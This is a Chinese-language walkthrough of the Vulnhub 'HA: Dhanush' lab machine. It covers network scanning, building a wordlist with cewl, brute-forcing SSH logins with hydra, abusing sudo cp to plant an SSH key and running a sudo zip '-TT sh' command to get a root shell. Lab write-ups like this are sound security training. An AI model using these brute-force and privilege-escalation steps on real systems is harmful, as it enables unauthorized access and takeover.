Vulnhub之Dhanush靶机测试过程

Dhanush

识别目标主机IP地址

(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ sudo netdiscover -i eth1 -r 192.168.187.0/24 
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                  
                                                                                                                                                
 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300                                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.187.1   00:50:56:c0:00:01      2     120  VMware, Inc.                                                                                 
 192.168.187.155 00:0c:29:ab:6e:4f      2     120  VMware, Inc.                                                                                 
 192.168.187.254 00:50:56:e2:20:55      1      60  VMware, Inc.          

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ sudo nmap -sS -sV -sC -p- 192.168.187.155 -oN nmap_full_scan                                                                           130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2023-07-12 02:46 EDT
Nmap scan report for 192.168.187.155
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Dhanush
|_http-server-header: Apache/2.4.29 (Ubuntu)
65345/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:2f:3d:dd:ac:42:d4:d5:de:ec:9b:19:0b:45:3e:13 (RSA)
|   256 89:02:8d:a5:e0:75:a5:34:3b:52:3a:6c:d1:f4:05:da (ECDSA)
|_  256 ea:af:62:07:73:d0:d5:1e:fb:a9:12:62:34:27:52:d9 (ED25519)
MAC Address: 00:0C:29:AB:6E:4F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


获得Shell

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ curl http://192.168.187.155/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.187.155 Port 80</address>
</body></html>
                          

目标不存在robots.txt文件

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ nikto -h http://192.168.187.155
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.187.155
+ Target Hostname:    192.168.187.155
+ Target Port:        80
+ Start Time:         2023-07-12 02:48:11 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 15a4, size: 596d81d0365ae, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2023-07-12 02:48:42 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

nikto工具没有扫描出有价值的信息。

目录扫描没有任何收获。

创建字典,看是否可以破解ssh用户名与口令:

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ cewl -d 3 http://192.168.187.155 -w dict.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ wc -l dict.txt 
114 dict.txt
┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ hydra -L dict.txt -P dict.txt ssh://192.168.187.155 -s 65345        

破解得到用户名密码为pinak/Gandiv

┌──(kali㉿kali)-[~/Vulnhub/dhanush]
└─$ ssh pinak@192.168.187.155 -p 65345              
The authenticity of host '[192.168.187.155]:65345 ([192.168.187.155]:65345)' can't be established.
ED25519 key fingerprint is SHA256:MZF9Ir9Jya9Ybbdt2/YwEoX+fcFSl7U+HZU/4UcvdrY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.187.155]:65345' (ED25519) to the list of known hosts.
pinak@192.168.187.155's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Wed Feb 15 05:02:20 2023 from 10.1.1.143
pinak@ubuntu:~$ ls -alh

提权

pinak@ubuntu:~$ sudo -l
Matching Defaults entries for pinak on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pinak may run the following commands on ubuntu:
    (sarang) NOPASSWD: /bin/cp
pinak@ubuntu:~$ 

pinak@ubuntu:~$ sudo -u sarang /bin/cp id_rsa.pub /home/sarang/.ssh/authorized_keys
pinak@ubuntu:~$ ssh sarang@127.0.0.1 -p 65345
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Feb 15 06:08:49 2023 from 127.0.0.1

根据pinak的.bash_history提示,将其id_rsa.pub文件拷贝到sarang用户的authorized_keys,这样就可以利用其私钥登录sarang的shell了。

sarang@ubuntu:~$ sudo -l
Matching Defaults entries for sarang on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sarang may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/zip
sarang@ubuntu:~$ cd /tmp
sarang@ubuntu:/tmp$ TF=$(mktemp -u)
sarang@ubuntu:/tmp$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# cd /root
# ls -alh
total 24K
drwx------  3 root root 4.0K Nov  8  2019 .
drwxr-xr-x 22 root root 4.0K Nov  8  2019 ..
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
-rw-r--r--  1 root root 1.5K Nov  8  2019 flag.txt
drwxr-xr-x  3 root root 4.0K Nov  7  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
# cat flag.txt
          
                                            @p
                                           @@@.
                                          @@@@@
                                         @@@@@@@
                                        *"`]@P ^^
                                           ]@P
                                           ]@P
                               ,,,,        ]@P       ,,gg,,
                           g@@@@@@@@@b     ]@P    ,@@@@@@@@@@g,
                        ,@@@@@@BNPPNB@@@@@@@@@@@@@@@@P**PNB@@@@@w
                      g@@@@P^`        %NNNNN@NNNNNP          *B@@@g
                    g@@@P`                 -@                   "B@@w
                  ,@@@`                    ]@                      %@@,
                 @@P-                      ]@                        *@@,
              ,@@"                         ]@                          *B@
            ,@N"                          y@@B                            %@,
      ,,  g@P-                            ]@@@P                             *Bg ,gg
      @@@@$,,,,,,,,,,,,,,,,,,,,,,,,,,ggggg@@@@wwwwwwwwwgggggggggww==========mm4NNN"

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Nisha Sharma     : https://in.linkedin.com/in/nishasharmaa

+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|

这样就拿到了root flag和root shell.

经验教训

  1. 本靶机的关键在于生成字典,然后利用hydra破解ssh用户名和密码
posted @ 2023-07-12 15:21  Jason_huawen  阅读(68)  评论(0编辑  收藏  举报